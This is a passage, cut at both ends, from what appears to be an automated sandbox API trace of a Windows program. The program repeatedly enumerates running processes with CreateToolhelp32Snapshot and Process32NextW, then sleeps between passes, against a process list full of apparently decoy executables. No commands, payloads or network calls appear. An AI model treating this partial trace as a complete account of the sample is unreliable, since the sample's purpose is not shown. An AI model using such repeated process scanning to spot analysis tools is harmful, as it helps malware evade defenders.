cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0137.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0137.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0137.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0137.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0137.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0137.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0137.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0137.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0137.433] CloseHandle (hObject=0xbc) returned 1 [0137.433] Sleep (dwMilliseconds=0x12c) [0137.754] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.759] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0137.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.763] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0137.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.768] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0137.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.776] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0137.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.785] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0137.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0137.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0137.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0137.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0137.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0137.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0137.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0137.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0137.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0137.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0137.903] CloseHandle (hObject=0xc4) returned 1 [0137.903] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.908] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0137.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.910] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.912] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0137.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0137.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0137.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 